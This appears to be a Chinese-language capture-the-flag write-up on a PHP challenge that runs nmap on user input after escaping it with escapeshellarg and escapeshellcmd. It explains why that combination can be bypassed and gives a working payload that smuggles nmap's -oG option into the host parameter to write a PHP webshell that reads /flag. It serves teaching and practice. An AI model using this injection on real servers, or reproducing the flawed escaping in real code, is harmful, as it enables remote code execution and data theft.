<?php
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
if(!isset($_GET['host'])) {
highlight_file(__FILE__);
} else {
$host = $_GET['host'];
$host = escapeshellarg($host);
$host = escapeshellcmd($host);
$sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
echo 'you are in sandbox '.$sandbox;
@mkdir($sandbox);
chdir($sandbox);
echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}
还是太菜了,一步一步来吧(呜呜呜)
首先看代码
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
判断$_SERVER['HTTP_X_FORWARDED_FOR']
是否存在,如果存在,将它的值赋给$_SERVER['REMOTE_ADDR']
if(!isset($_GET['host'])) {
highlight_file(__FILE__);
}
检查host是否设置,如果没有设置则点亮代码,否则执行下面语句
else {
$host = $_GET['host'];
$host = escapeshellarg($host);
$host = escapeshellcmd($host);
$sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
echo 'you are in sandbox '.$sandbox;
@mkdir($sandbox);
chdir($sandbox);
echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}
主要看这个 $host = escapeshellarg($host); $host = escapeshellcmd($host);
escapeshellarg和escapeshellcmd是两个php函数
escapeshellarg:
返回一个转义的字符串,并且结果会被单引号包裹起来
escapeshellcmd:
将下面这些字符转义,即加上\,确保不会解释为shell操作符
&
;
|
'
"
>
<
\
*
?
~
^
(
)
[
]
{
}
$
\n
最后的部分
$sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
//创建一个沙盒名称
echo 'you are in sandbox '.$sandbox;
//输出沙盒信息
@mkdir($sandbox);
//创建沙盒目录
chdir($sandbox);
//进入沙盒目录
echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
//-T5: 设置扫描的速度,T5 是最快的扫描模式
//-sT: 执行TCP连接扫描
//-Pn: 禁用主机发现,假设目标主机是在线的
//--host-timeout 2: 设置超时为2秒,如果扫描主机超时,则跳过
//-F: 快速扫描,只扫描一些常见端口
//".$host": 这是要扫描的目标主机,变量 $host 代表了目标主机的地址
传入的参数是:172.17.0.2' -v -d a=1
经过escapeshellarg处理后变成了'172.17.0.2'\'' -v -d a=1',即先对单引号转义,再用单引号将左右两部分括起来从而起到连接的作用。
经过escapeshellcmd处理后变成'172.17.0.2'\\'' -v -d a=1\',这是因为escapeshellcmd对\以及最后那个不配对儿的引号进行了转义:http://php.net/manual/zh/function.escapeshellcmd.php
最后执行的命令是curl '172.17.0.2'\\'' -v -d a=1\',由于中间的\\被解释为\而不再是转义字符,所以后面的'没有被转义,与再后面的'配对儿成了一个空白连接符。所以可以简化为curl 172.17.0.2\ -v -d a=1',即向172.17.0.2\发起请求,POST 数据为a=1'。
nmap命令中有个参数 -oG 可以实现将命令和结果写到文件,所以这里我们就可以通过这个命令写入一句话木马或者直接cat flag,以此来执行命令
?host=' <?php echo `cat /flag`;?> -oG test.php '
最后访问url/题目生成的md5值/test.php